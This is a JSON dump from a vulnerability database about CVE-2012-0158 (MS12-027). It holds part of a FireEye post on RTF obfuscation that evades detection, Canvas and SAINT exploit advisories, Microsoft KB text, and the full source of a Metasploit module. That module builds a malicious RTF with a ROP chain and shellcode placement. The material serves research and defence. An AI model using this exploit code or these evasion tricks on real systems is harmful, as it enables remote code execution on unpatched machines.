\\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. 
\n\nObfuscated:\n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n\nClear:\n\n{\\object\\objocx\\objdata 4444444455556666} \n\n\\par is a known control word that does not accept any data. The RTF parser skips the control word, and only the data that follows remains.\n\n2.\n\nObfuscated:\n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n\nClear:\n\n{\\object\\objocx\\objdata 444444446666} \n\nThe RTF parser also recognizes \\datastore and knows that it accepts data, so the data that follows is consumed by \\datastore.\n\n3.\n\nObfuscated:\n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n\nClear:\n\n{\\object\\objocx\\objdata 444444446666} \n\nHere \\unknown is not a control word the parser recognizes, and because the group is marked with \\\\*, the whole destination is ignored, its data included.\n\nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to an OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed to by lpolestream contains a pointer to the OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump the object data, which has already been de-obfuscated by the RTF parser:\n\n\n\nThe last command, .writemem, writes a section of memory to d:\\evil_objdata.bin. You can specify any other path; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the \\objdata obfuscation techniques also apply to embedded images, but for images there seems to be no hook as convenient as OleConvertOLESTREAMToIStorage. 
To extract an obfuscated picture, a data breakpoint quickly locates the RTF parsing code, which reveals the best point at which to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversaries perform obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "edition": 2, "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:12", "edition": 3, "description": "**Name**| ms12_027 \n---|--- \n**CVE**| CVE-2012-0158 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-027 MSCOMCTL.OCX ActiveX Buffer Overflow \n**Notes**| CVE Name: CVE-2012-0158 \nVENDOR: Microsoft 
\nNotes: \n \nYou should manually start a Universal listener for this exploit. \nThe listener IP and PORT should be declared in the module configuration \ndialog. \n \nTested on: \n* Windows XP Professional SP3 English with Office 2010 Standard \n* Windows 7 English. \n \nThe Universal Windows version needs the target to have Word opened \nfor a few seconds before executing the file. \n \nUsage: \nGenerate rtf file and send to target. \n \n \nVersionsAffected: Office 2003 to Office 2010 SP1 \nRepeatability: \nMSADV: MS12-027 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-027 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 \nDate public: 04/10/2012 \nCVSS: 9.3 \n\n", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "canvas", "title": "Immunity Canvas: MS12_027", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-10T21:55:00", "id": "MS12_027", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_027", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2022-01-26T11:36:03", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. 
Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:2837E3FFCA88074AEA3D7A814D67BEC2", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: 
[52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:23", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. 
Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:29", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: 
[52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:53", "description": "", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "packetstorm", "title": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-25T00:00:00", "id": "PACKETSTORM:112176", "href": "https://packetstormsecurity.com/files/112176/MS12-027-MSCOMCTL-ActiveX-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in MSCOMCTL.OCX. 
It uses a malicious \nRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited \nin the wild on April 2012. \n \nThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office \n2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \n\"msgr3en.dll\", which will load after office got load, so the malicious file must \nbe loaded through \"File / Open\" to achieve exploitation. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0158' ], \n[ 'OSVDB', '81125' ], \n[ 'BID', '52911' ], \n[ 'MSB', 'MS12-027' ], \n[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ], \n[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500, \n'Space' => 900, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# winword.exe v12.0.4518.1014 (No Service Pack) \n# winword.exe v12.0.6211.1000 (SP1) \n# winword.exe v12.0.6425.1000 (SP2) \n# winword.exe v12.0.6612.1000 (SP3) \n[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Offset' => 270, \n'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45 \n'Rop' => false \n} \n], \n# winword.exe v14.0.6024.1000 (SP1) \n[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll \n'Rop' => true, \n'RopOffset' => 120 \n} \n], \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), \n], self.class) \nend \n \ndef stream(bytes) 
\nRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\") \nend \n \ndef junk(n=1) \ntmp = [] \nvalue = rand_text(4).unpack(\"L\")[0].to_i \nn.times { tmp << value } \nreturn tmp \nend \n \n# Ikazuchi ROP chain (msgr3en.dll) \n# Credits to Abysssec \n# http://abysssec.com/files/The_Arashi.pdf \ndef create_rop_chain \nrop_gadgets = [ \n0x3F2CB9E0, # POP ECX # RETN \n0x3F10115C, # HeapCreate() IAT = 3F10115C \n# EAX == HeapCreate() Address \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address. \n0x3F39AFCF, # CALL EAX # RETN \n0x00040000, \n0x00010000, \n0x00000000, \n0x3F2CB9E0, # POP ECX # RETN \n0x00008000, # pop 0x00008000 into ECX \n# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap \n0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN \njunk, \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address. \n# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;) \n0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN \n0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero! \n# then we add ESP to the Zero which result in storing ESP into that address, \n# we need ESP address for copying shellcode ( which stores in Stack ), \n# and we have to get it dynamically at run-time, now with my tricky instruction, we have it! \n0x3F2F18CC, # POP EAX # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX \n# makes ECX point to nearly offset of Stack. \n0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN \n0x3F39795E, # POP EDX # RETN \n0x00000024, # pop 0x00000024 into EDX \n# add 0x24 to ECX ( Stack address ) \n0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN \njunk, \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, \n# and the popping it into ESI ! 
now ESI point where shellcode stores in stack \n0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# makes EDI = Our RWX Heap Address \n0x3F2B0A7C, # XCHG EAX,EDI # RETN 4 \n0x3F2CB9E0, # POP ECX # RETN \njunk, \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# just skip some junks \n0x3F38BEFB, # ADD AL,58 # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent ) \n# Copy shellcode from stack into RWX Heap \n0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN \njunk(2), # pop into edi # pop into esi \n0x3F39AFCF # CALL EAX # RETN \n].flatten.pack(\"V*\") \n \n# To avoid shellcode being corrupted in the stack before ret \nrop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here \nreturn rop_gadgets \n \nend \n \ndef exploit \n \nret_address = stream([target.ret].pack(\"V\")) \n \nif target['Rop'] \nshellcode = stream(create_rop_chain) \nelse \n# To avoid shellcode being corrupted in the stack before ret \nshellcode = stream(make_nops(target['Offset'])) \nshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string) \nshellcode << stream(make_nops(4)) \nend \nshellcode << stream(payload.encoded) \nwhile shellcode.length < 2378 \nshellcode += \"0\" \nend \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\" \ncontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\" \ncontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\" \ncontent << \"{\\\\object\\\\objocx\" \ncontent << 
\"{\\\\*\\\\objdata\" \ncontent << \"\\n\" \n# [embedded object hex dump omitted] \ncontent << ret_address \ncontent << \"9090909090909090\" \ncontent << shellcode \n# [trailing zero-padding hex dump omitted] \ncontent << \"\\n\" \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \nend \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/112176/ms12_027_mscomctl_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:43:29", "description": "<html><body><p>Resolves a vulnerability in MSCOMCTL.OCX could allow Remote Code Execution. This was released on April 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-027. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201204.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201204.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-027\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-027</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" 
target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/><br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/983807\" id=\"kb-link-8\">983807 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Analysis Services Service Pack 4 QFE: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983808\" id=\"kb-link-9\">983808 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 GDR: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983809\" id=\"kb-link-10\">983809 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 QFE: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2597112\" id=\"kb-link-11\">2597112 </a> MS12-027: Description of the security update for Microsoft Office 2003 Service Pack 3: April 10, 2012<br/><br/>Known issue in security update 2597112:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. 
In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598039\" id=\"kb-link-12\">2598039 </a> MS12-027: Description of the security update for Office 2010: April 10, 2012 <br/><br/>Known issue in security update 2598039:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. 
These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598041\" id=\"kb-link-13\">2598041 </a> MS12-027: Description of the security update for 2007 Microsoft Office system: April 10, 2012<br/><br/>Known issue in security update 2598041:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. 
These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2641426\" id=\"kb-link-14\">2641426 </a> MS12-027: Description of the security update for Visual Basic 6: April 10, 2012<br/><br/>Known issue in security update 2641426:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2645025\" id=\"kb-link-15\">2645025 </a> MS12-027: Description of the security update for Microsoft BizTalk Server 2002: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2647488\" id=\"kb-link-16\">2647488 </a> MS12-027: Description of the security update for Fox Pro 8.0 Service Pack 1: April 10, 2012<br/><br/>Known issue in security update 2647488:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\"><span class=\"text-base\">Add or Remove Programs</span></strong> item or the <strong class=\"uiterm\"><span class=\"text-base\">Programs and Features</span></strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2647490\" id=\"kb-link-17\">2647490 </a> MS12-027: Description of the security update for Fox Pro 9.0 Service Pack 2: April 10, 2012<br/><br/>Known issue in security update 2647490:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control 
Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2655547\" id=\"kb-link-18\">2655547 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658674\" id=\"kb-link-19\">2658674 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2002: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2658676\" id=\"kb-link-20\">2658676 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009 R2: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658677\" id=\"kb-link-21\">2658677 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2007: April 10, 2012<br/><br/>Known issue in security update 2658677:<ul class=\"sbody-free_list\"><li>If you uninstall this security update, the version of Mscomctrl.ocx does not roll back to the original version.</li></ul></li></ul></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "mskb", "title": "MS12-027: Vulnerability in MSCOMCTL.OCX could allow Remote Code 